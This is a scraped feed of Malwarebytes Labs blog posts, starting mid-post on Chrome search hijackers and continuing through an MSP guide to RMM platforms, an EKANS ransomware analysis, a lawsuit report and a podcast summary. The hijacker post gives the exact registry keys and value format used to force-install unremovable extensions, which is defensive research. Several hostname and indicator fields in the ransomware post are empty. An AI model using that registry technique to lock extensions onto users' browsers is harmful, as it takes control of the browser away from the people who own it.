Basically, this is telling the user that the browser may be managed outside of Chrome and the administrator has installed an extension. Even users that have Administrator accounts on the affected systems are unable to remove these extensions.

The extension in question is easily spotted in an overview of all the installed extensions as it is the one that has no “Remove” option.

There is no “Remove” button for the spotted search hijacker

We have found several of these search hijackers in the Chrome webstore but installing them from there does not lead to the “managed browser symptoms.” It takes a Windows installer to make the necessary registry changes, so users that installed it from the webstore should be able to remove it themselves in the normal way.

Installed from the webstore the extensions have a “Remove” button

What all the hijackers that use the managed browser technique have in common is that they add the registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist

under which the forced extensions are numerated as registry values like this:

"1"="REG_SZ", "lpfpbajbnhddlpljjnfndngbkkfkjfna;"

The description in the Chromium documentation about the ExtensionInstallForcelist states:

Specifies a list of apps and extensions that are installed silently, without user interaction, and which cannot be uninstalled nor disabled by the user.

How do these hijackers land on victim’s systems?

We are not completely sure but we did manage to round up some stand alone installers from the Temp folder on affected Windows systems. And it looks as if these installers were part of a bundler.

What victims will typically see is an installer notice like this one:

and then nothing until they open Chrome and see this new tab:

and the “your browser is managed by a remote administrator” type of comment scattered throughout the Chrome menu and settings.

Search hijackers in general

Search hijackers come in different flavors. Basically, they can be divided into three main categories if you look at their methodology:

  • The hijacker redirects victims to the best paying search engine.
  • The hijacker redirects victims to their own site and show additional sponsored ads.
  • The hijacker redirects victims to a popular search engine after inserting or replacing sponsored ads.

By far the most common vehicle are browser extensions, whether they are called extensions, add-ons, or browser helper objects. But you will see different approaches here as well:

  • The extension lets the hijacker take over as the default search engine.
  • The extension takes over as “newtab” and shows a search field in that tab.
  • The extension takes permission to read and change your data on websites. It uses these permissions to alter the outcome of the victim’s searches.

This family is of the kind that uses their own site as a redirect to the search engine they get paid by, and the extension takes over as default search engine. The default is the one that gets queried when the user searches from the address bar.


Malwarebytes recognizes these hijackers and removes them from affected systems. You can find a few removal guides on our forums:

Removal guide for Mazy Search

Removal guide for SearchSpace

And at the rate they are pushing out new ones, more will probably follow.


Extension identifiers

fhmghdmcgkkdadabbnkmnejhoncccjio (Capita)

lpfpbajbnhddlpljjnfndngbkkfkjfna (search space)

fifailmmmlkdabfkkoejgffjdfgbieji (Mazy)


Stay safe everyone!

The post Search hijackers change Chrome policy to remote administration appeared first on Malwarebytes Labs.

Categories: Malware Bytes

MSPs, know what you’re really looking for in an RMM platform

Malware Bytes Security - Wed, 06/10/2020 - 11:30am

MSPs naturally adapt and mature as innovative technologies and more effective processes are introduced into the industry. But with ransomware cyberattacks happening left and right, pushing them to evolve even further, MSPs are left with no choice but to go with the flow. Going for improved functionalities—although important—is simply no longer enough. MSPs must begin putting a lot of emphasis on improving their security for the continuous protection of their most valuable assets.

With ransomware threat actors exploiting weaknesses in remote monitoring and management (RMM) platforms to get into endpoints by the thousands, MSPs have found themselves wondering whether their platform is secure, robust, and agile enough with the changing threat landscape. To help them decide, let us look at the key points to consider when choosing an RMM that is right for them.

Helping MSPs look for “the one”

Indeed, there is no “one-size-fits-all” RMM platform. Every MSP has its own unique needs, and vendors must meet those needs so both can deliver high quality service and grow together as one.

Whether you’re an experienced MSP who is evaluating your current RMM or contemplating on switching to another vendor, or you’re a new MSP who is on the lookout for an RMM platform that best fits your unique business needs, we offer you a guide in finding “the one.”


Ask: “Does this RMM vendor take security seriously as much as we do?”

A security-conscious MSP looks for security present in an RMM vendor’s product. This should be a necessity as their business is at stake, most especially if you’re an MSP that handles all your clients’ data. It is only logical to look for a vendor that cares about the security of their clients’ assets the same way you, the MSP, care about the assets of your clients, too.

MSPs can start assessing for security by checking if the communication between entities are secure. For example, are endpoints communicating securely with the monitoring server? Is the monitoring server communicating securely with remote management devices/systems? Overall, does the RMM take a layered approach to secured communication between devices and apps, which in turn, protects the entire support chain?

Another point to think about is whether the platform provides multiple security role assignments for various kinds of users. Certain users can only have read-only access, for example, while others are granted higher privileges based on their job functions.

We cannot stress enough the importance of MSPs securing themselves to keep their clients safe from online attacks like ransomware. Being consistent in this regard on every facet of the decision-making process will only put MSPs at a significant advantage.


Ask: “Does this RMM adapt to new demands and scale really well with the changing trends?

RMM platforms and solutions aren’t something new. In fact, some of them have been around for decades. With this in mind, MSPs should look at how much the RMM has changed since it first offered its service, what has it done so far to keep up with the ever-changing business landscape, and how it has planned to evolve for the future.

Legacy RMMs were never created with the modern MSP, thousands upon thousands of endpoints to support, and the Internet of Things (IoT) in mind. There are far better designed RMMs today that are built to deliver robust, multi-tenant solutions—meaning, the ability to manage disparate multiple clients and/or managing access to multiple application for various clients using a single application or platform—for MSPs. RMMs that offer these are foreseen as best positioned for the future. It is, therefore, paramount for MSPs to partner with a vendor that scales well with market demand and doesn’t hold them back when it comes to their own business growth.

Proactive, with the drive for change

Ask: “Does the RMM vendor provide proactive patching and show momentum in improving?

Not only should MSPs look for an RMM that has a long-term product roadmap and how they regularly release updates for it, but they should also start looking at how their current or potential vendor go about actively [1] monitoring the threat landscape and [2] looking for flaws to their own software before the bad guys would even have time to know about and create an exploit for it.

MSPs have realized that reacting to cyberattacks doesn’t work. And while it is admirable for an RMM vendor to be able to determine a security flaw and patch it as quickly as they can to mitigate infection, preventing something big from happening far outweighs mitigating what has already happened.

Apart from patching, a good RMM must also show that it is continuously improving their own products by adding more helpful functionalities, enhancing what’s most used, and doing away with whatever is not beneficial for MSPs.

Ease of use

Ask: “How easily can my employees use this platform?

MSPs look for software that not only gets the job done but are also easy to operate. Aesthetics (better designed, interface-wise) combined with functionality come into play here. The UI must be easy to understand and navigate, each bit of what is shown gives technicians a clear idea of what they want to know about their endpoints. Furthermore, it must allow MSPs to customize the tool that fits their business needs.

Of course, no matter how intuitive the platform claims to be, it’s still new software that no one in the company is familiar with it. That said, a good RMM must offer training for MSP technicians to fully understand the platform and use it well and proficiently. Know that the more complex the tool, the longer the training; the longer the training, the greater the cost; and the more complex the tool, the higher the risk that the trained technician would be making mistakes.


Ask: “Can the RMM platform be accessed via mobile devices?

With everyone carrying at least one mobile device with them, going mobile is no longer a want but, for many, is also now a need. An RMM solution that MSP technicians can use outside of the office can be an extremely valuable feature, especially when a real-time alert kicks in. The MSP technician must be able to perform troubleshooting tasks using a small screen and over a cellular network. An MSP that can deliver quality service anytime and anywhere is something that current and potential clients vie for and may become highly in-demand in the future.

For MSPs, security is at the forefront in these uncertain times

Choosing a vital tool like an RMM platform is not an easy and quick process for MSPs to go through. It takes careful thinking and a lot of time and effort in evaluating. For new MSPs, this process is probably one of the most challenging, more so if all RMMs seemingly offer the same. At the end of the day, however, finding that one RMM vendor you can grow your business and expand your portfolio offerings with is totally worth it. Potential and current clients not only see MSPs as software and hardware experts, but they are quickly looking up to them as security advisers as well.

Having insight on the current trends and following these considerations, coupled with asking the right questions, is not only strategic. It is also the first step in laying down the cornerstone for future-proofing your business.

Good luck in your search!

The post MSPs, know what you’re really looking for in an RMM platform appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Honda and Enel impacted by cyber attack suspected to be ransomware

Malware Bytes Security - Tue, 06/09/2020 - 11:53pm

Car manufacturer Honda has been hit by a cyber attack, according to a report published by the BBC, and later confirmed by the company in a tweet. Another similar attack, also disclosed on Twitter, hit Edesur S.A., one of the companies belonging to Enel Argentina which operates in the business of energy distribution in the City of Buenos Aires.

Based on samples posted online, these incidents may be tied to the EKANS/SNAKE ransomware family. In this blog post, we review what is known about this ransomware strain and what we have been able to analyze so far.

Targeted ransomware with a liking for ICS

First public mentions of EKANS ransomware date back to January 2020, with security researcher Vitali Kremez sharing information about a new targeted ransomware written in GOLANG.

The group appears to have a special interest for Industrial Control Systems (ICS), as detailed in this blog post by security firm Dragos.

Figure 1: EKANS ransom note

On June 8, a researcher shared samples of ransomware that supposedly was aimed at Honda and ENEL INT. When we started looking at the code, we found several artefacts that corroborate this possibility.

Figure 2: Mutex check

When the malware executes, it will try to resolve to a hardcoded hostname ( If, and only if it does, will the file encryption begin. The same logic, with a specific hostname, also applied to the ransomware allegedly tied to Enel.

Figure 3: Function responsible for performing DNS query

Target: Honda

  • Resolving internal domain:
  • Ransom e-mail: CarrolBidell@tutanota[.]com

Target: Enel

  • Resolving internal domain:
  • Ransom e-mail: CarrolBidell@tutanota[.]com
RDP as a possible attack vector

Both companies had some machines with Remote Desktop Protocol (RDP) access publicly exposed (reference here). RDP attacks are one of the main entry points when it comes to targeted ransomware opertaions.

  • RDP Exposed: /
  • RDP Exposed: /

However, we cannot say conclusively that this is how threat actors may have gotten in. Ultimately, only a proper internal investigation will be able to determine exactly how the attackers were able to compromise the affected networks.


We tested the ransomware samples publicly available in our lab by creating a fake internal server that would respond to the DNS query made by the malware code with the same IP address it expected. We then ran the sample alleged to be tied to Honda against Malwarebytes Nebula, our cloud-based endpoint protection for businesses.

Figure 4: Malwarebytes Nebula dashboard showing detections

We detect this payload as ‘Ransom.Ekans’ when it attempts to execute. In order to test another of our protection layers, we also disabled (not recommended) the malware protection to let the behavior engine do its thing. Our anti-ransomware technology was able to quarantine the malicious file without the use of any signature.

Ransomware gangs have shown no mercy, even in this period of dealing with a pandemic. They continue to target big companies in order to extort large sums of money.

RDP has been called out as some of the lowest hanging fruit preferred by attackers. However, we also recently learned about a new SMB vulnerability allowing remote execution. It is important for defenders to properly map out all assets, patch them, and never allow them to be publicly exposed.

We will update this blog post if we come across new relevant information.

Indicators of Compromise (IOCs)

Honda related sample:


Enel related sample:


The post Honda and Enel impacted by cyber attack suspected to be ransomware appeared first on Malwarebytes Labs.

Categories: Malware Bytes

ParetoLogic facing complaint of alleged wrongdoing

Malware Bytes Security - Tue, 06/09/2020 - 11:00am

A short while ago we reported on the FTC ruling against payment provider RevenueWire. Now, another Canadian company is under scrutiny, and the cases are very much related. Not only are these companies hailing from the same city, they also share some founders.

The company ParetoLogic is involved in a US class action lawsuit in which it is accused of having circulated programs that would charge customers to fix non-existent computer problems.

As we saw in our previous coverage, RevenueWire—acting under the name SafeCart—was charged under the accusation that they provided services as a payment provider for companies that were involved in tech support scams. RevenueWire denies the allegations, and issued a statement saying it settled to avoid protracted litigation and legal costs.

The case of ParetoLogic

In the case at hand, the plaintiff Archie Beaton sued Defendant SpeedyPC Software (“SpeedyPC”), a British Columbia company, alleging that it was engaged in fraudulent and deceptive marketing of SpeedyPC Pro (“Speedy PC Pro” or the “Software”), a computer software product that claimed to be able to diagnose and repair various PC errors.

In this context it is good to know that SpeedyPC Pro is the name of a program that the plaintiff purchased, and this program was produced, marketed, and sold by ParetoLogic.

The United States District Court for the Northern District of Illinois Eastern Division set out under the notice that “SpeedyPC Software appears to be the trade name of a company known as ParetoLogic, Inc. To avoid confusion, the Court will refer to the defendant only as SpeedyPC Software.”

ParetoLogic software

SpeedyPC was not the only software issued by ParetoLogic. Many similar programs were marketed in very much the same way. What they all had in common is that they fall in a category we refer to as “system optimizers.” This type of software combines some or all of the below functionalities:

  • Registry cleaner
  • Driver updater
  • Temp file cleaner
  • Disk optimizer (disk defragmenter)
  • System error reporter

Since all these functionalities are offered by free tools built into the Windows operating system, many system optimizers are considered Potentially Unwanted Programs (PUPs), especially if they exaggerate the seriousness of possible improvements that can be made on a user’s system.

A well-known example of a ParetoLogic product is PC Health Advisor:

The ties with RevenueWire

What’s interesting in this case is that ParetoLogic Inc. was co-founded by the same partners behind another Victoria, Canada tech company, RevenueWire, that recently settled fraud charges with the U.S. Federal Trade Commission for US$6.7 million.

RevenueWire handled the sales and distribution of software and digital products for many developers and publishers worldwide. In fact, part of RevenueWire’s alleged scheme involved serving as a legitimate face for software companies that had already been denied by large, trusted payment processors, and according to at least one online forum, ParetoLogic may have fit that description, as it did not appear to accept PayPal.

The case against ParetoLogic

ParetoLogic has been fighting the plaintiffs’ right to start a class-action case in the US on several grounds since 2015 but was unsuccessful in this attempt to avoid going to court over the charges. Archie Beaton’s motion to certify a class for his complaint—which basically serves as a request to gather other folks facing similar, alleged wrongdoing into one lawsuit—against ParetoLogic was granted in October 2017 and was upheld at the U.S. Court of Appeals for the Seventh Circuit in Chicago in October 2018.

Grounds for the case

Beaton looked online for a fix for some computer problems he was experiencing and found a free trial of SpeedyPC Pro. As per usual with this type of software the program reported some problems with the system, but let the user know they needed the paid version to fix said problems.

From the Court of Appeals for the Seventh Circuit:

Using his personal business’s credit card, [Beaton] purchased SpeedyPC Pro and ran it on his laptop. It began by scanning his device, just as the free trial had done. The program then told Beaton to click on “Fix All.” Beaton dutifully did so. Yet nothing happened. Beaton ran the software a few more times, to no avail. Feeling ripped off, and suspecting that his experience was not unique, Beaton sued Speedy in 2013 on behalf of a class of consumers defined as “All individuals and entities in the United States who have purchased SpeedyPC Pro.” Despite Speedy’s lofty pledges, Beaton claimed, the software failed to perform as advertised. Instead, it indiscriminately and misleadingly warned all users that their devices were in critical condition, scared them into buying SpeedyPC Pro, and then ran a functionally worthless “fix.”

Decision of the court

Speedy identified 10 individual issues that allegedly defeated predominance. The district court was not persuaded. It found that some were best addressed on a class‐wide basis, and they outweighed the remaining individualized inquiries.

“Finding no abuse of discretion in the district court’s decisions to certify the nationwide class and the Illinois subclass, we affirm the court’s certification orders,” the court wrote.

In layman’s terms, this means the plaintiff can represent other victims of ParetoLogic’s SpeedyPC and seek compensation for their damages.


This case has been on the table since 2014 and it can take a few more years before the courts decide on a final ruling about compensation. Meanwhile, ParetoLogic’s Victoria offices have been closed and its website has been taken offline. Provincial government records show it is still registered as an active corporation and its last annual report was filed in January.

The post ParetoLogic facing complaint of alleged wrongdoing appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep8: Securely working from home (WFH) with John Donovan and Adam Kujawa

Malware Bytes Security - Mon, 06/08/2020 - 11:31am

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to John Donovan, head of security at Malwarebytes, and Adam Kujawa, director of Malwarebtyes Labs, about securely working from home (WFH).

With shelter-in-place orders now in full effect to prevent the spread of coronavirus, countless businesses find themselves this year in mandatory work-from-home situations. On today’s episode, we go beyond just talking about threats. We have a dialogue.

First, what types of malware and attack methods are we seeing, and then, how has Malwarebytes responded. We want to give you an inside look, because even though we’re a cybersecurity company, staying cyber secure goes beyond malware detection. It reaches into educating your employees and implementing proper policies to protect your company.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on: Plus other cybersecurity news:
  • Bug bounty hunter snags $100,000 award for zero-day bug in ‘Sign in with Apple‘ system. (Source: TechSpot)
  • 100,000 company inboxes hit with voice message phishing. (Source: Bleeping Computer)
  • 80% of organizations suffered at least one cloud data breach in the past 18 months. (Source: Ciso Mag)
  • Mongolia arrests 800 Chinese citizens in cybercrime probe. (Source: Reuters)
  • Minnesota used contact tracing to track protestors, which created a trust problem for medical workers in the pandemic. (Sources: BGR and Cnet)

Stay safe, everyone!

The post Lock and Code S1Ep8: Securely working from home (WFH) with John Donovan and Adam Kujawa appeared first on Malwarebytes Labs.

Categories: Malware Bytes